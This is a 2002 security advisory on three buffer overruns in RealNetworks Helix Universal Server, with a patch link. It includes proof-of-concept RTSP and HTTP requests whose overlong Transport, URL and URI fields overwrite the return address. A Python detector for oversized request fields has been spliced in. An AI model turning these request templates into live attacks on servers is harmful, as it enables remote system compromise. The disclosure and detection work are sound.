[NEWS] Multiple Buffer overruns RealNetworks Helix Universal Server

From: support@securiteam.com
Date: 12/25/02


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Multiple Buffer overruns RealNetworks Helix Universal Server
    ------------------------------------------------------------------------

    SUMMARY

    According to REAL, the Helix Universal Server is the only universal
    platform with support for live and on-demand delivery of all major media
    file formats, including Real Media, Windows Media, QuickTime, MPEG 4, MP3,
    MPEG 2, and more. The Helix server is vulnerable to multiple buffer
    overrun vulnerabilities. Previous versions were not tested but it is
    assumed that they too may be vulnerable.

    DETAILS

    Vulnerable systems:
     * RealNetworks Helix Universal Server 9.0 under Windows, FreeBSD, HP-UX,
    AIX, Linux, Sun Solaris 2.7 & 2.8

    The Helix server uses the RTSP protocol, which is based upon HTTP.

    Vulnerability One:
    By supplying an overly long character string within the Transport field
    of a SETUP RTSP request to a Helix server, which by default listens on TCP
    port 554, an overflow will occur that overwrites the saved return address
    on the stack. On a Windows box, the Helix server is installed by default as
    a system service, so exploitation of this vulnerability would result in a
    complete server compromise, with supplied code executing in the security
    context of SYSTEM. The impact of these vulnerabilities on UNIX-based
    platforms was not tested, though those platforms are vulnerable.

    SETUP rtsp://www.ngsconsulting.com:554/real9video.rm RTSP/1.0
    CSeq: 302
    Transport: AAAAAAAAA-->

    Vulnerability Two:
    By supplying a very long URL in a DESCRIBE request, again over port 554,
    an attacker can overwrite the saved return address, allowing the execution
    of code.

    DESCRIBE rtsp://www.ngsconsulting.com:554/AAAAAAAA-->.smi RTSP/1.0
    CSeq: 2
    Accept: application/sdp
    Session: 4668-1
    Bandwidth: 393216
    ClientID: WinNT_5.2_6.0.11.818_RealPlayer_R1P04D_en-us_UNK
    Cookie: cbid=www.ngsconsulting.com
    GUID: 00000000-0000-0000-0000-000000000000
    Language: en-us
    PlayerCookie: cbid
    RegionData: myregion
    Require: com.real.retain-entity-for-setup
    SupportsMaximumASMBandwidth: 1

    Vulnerability Three:
    By making two HTTP requests (port 80) containing long URIs simultaneously
    (the first connection will appear to hang; keep that session open, make
    another connection and supply the same request again), the saved return
    address is also overwritten, allowing an attacker to run arbitrary code of
    their choosing.

    GET /SmpDsBhgRl3a685b91-442d-4a15-b4b7-566353f4178fAAAAAA--> HTTP/1.0
    User-Agent: RealPlayer G2
    Expires: Mon, 18 May 1974 00:00:00 GMT
    Pragma: no-cache
    Accept: application/x-rtsp-tunnelled, */*
    ClientID: WinNT_5.2_6.0.11.818_RealPlayer_R1P04D_en-us_UNK
    Cookie:
    cbid=dfjgimiidjcfllgheokrqprqqojrptnpikcjkioigjdkfiplqniomprtkronoqmuekigihdi
    X-Actual-URL: rtsp://www.ngssoftware.com/nosuchfile.rt
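All three issues above share one observable on the wire: a single request field (the Transport header value, the DESCRIBE URL, or the GET URI) that is far longer than any real client would send. The following Python is an added example, not code from the advisory, from NGSSoftware or from RealNetworks. It parses an RTSP or HTTP request (RTSP reuses HTTP message framing, as noted above) and reports fields whose length exceeds an assumed limit; the limits, the hostname in the constructed samples and the function names are illustrative assumptions. It checks one request at a time, so it does not model the two-connection condition of the third issue, only the long URI each of those requests carries.

```python
"""Length-anomaly check for RTSP / HTTP request messages (added example).

Not part of the advisory. Splits a request into request line and headers
and flags values whose length is implausible for a real client, which is
the common shape of the three overruns described in the advisory.
"""
from dataclasses import dataclass, field

# Assumed limits for illustration; a real RTSP/1.0 URL or Transport value is
# a few hundred bytes at most, so anything far beyond that is worth alerting on.
MAX_URI_LEN = 1024
MAX_HEADER_VALUE_LEN = 1024


@dataclass
class Request:
    method: str
    uri: str
    version: str
    headers: dict = field(default_factory=dict)


def parse_request(raw: bytes) -> Request:
    """Parse the request line and headers of an RTSP or HTTP request.

    Only the head of the message is examined; the body (after the blank
    line) is ignored. Header names are lower-cased for lookup.
    """
    text = raw.decode("latin-1").replace("\r\n", "\n")
    head = text.split("\n\n", 1)[0]
    lines = head.split("\n")
    parts = lines[0].split(" ", 2)
    if len(parts) != 3:
        raise ValueError("malformed request line")
    req = Request(*parts)
    for line in lines[1:]:
        if not line:
            continue
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError(f"malformed header: {line!r}")
        req.headers[name.strip().lower()] = value.strip()
    return req


def find_anomalies(raw: bytes) -> list:
    """Return (field, length) tuples for every oversized field in the request."""
    req = parse_request(raw)
    findings = []
    if len(req.uri) > MAX_URI_LEN:
        findings.append(("request-uri", len(req.uri)))
    for name, value in req.headers.items():
        if len(value) > MAX_HEADER_VALUE_LEN:
            findings.append((name, len(value)))
    return findings


# Constructed sample requests (hostname and values are made up for the example).
SAMPLE_BENIGN = (
    b"SETUP rtsp://media.example.test:554/clip.rm RTSP/1.0\r\n"
    b"CSeq: 302\r\n"
    b"Transport: RTP/AVP;unicast;client_port=6970-6971\r\n\r\n"
)
SAMPLE_LONG_TRANSPORT = (
    b"SETUP rtsp://media.example.test:554/clip.rm RTSP/1.0\r\n"
    b"CSeq: 302\r\n"
    b"Transport: " + b"A" * 4096 + b"\r\n\r\n"
)
SAMPLE_LONG_GET_URI = (
    b"GET /" + b"A" * 3000 + b" HTTP/1.0\r\n"
    b"User-Agent: RealPlayer G2\r\n\r\n"
)

if __name__ == "__main__":
    for label, sample in (("benign", SAMPLE_BENIGN),
                          ("long transport", SAMPLE_LONG_TRANSPORT),
                          ("long GET uri", SAMPLE_LONG_GET_URI)):
        print(label, find_anomalies(sample))
```

The same parser can be pointed at a packet capture of port 554 or port 80 traffic to a media server; a hit on the Transport header or the request URI is the kind of event worth correlating with a server restart or crash log.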

    Fix Information:
    NGSSoftware alerted RealNetworks to these issues on 8/11/2002,
    30/11/2002 and 12/11/2002 respectively. A patch has now been made available
    from
    http://www.service.real.com/help/faq/security/bufferoverrun12192002.html

    ADDITIONAL INFORMATION

    The information has been provided by NGSSoftware Insight Security Research
    <mailto:nisr@nextgenss.com>.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


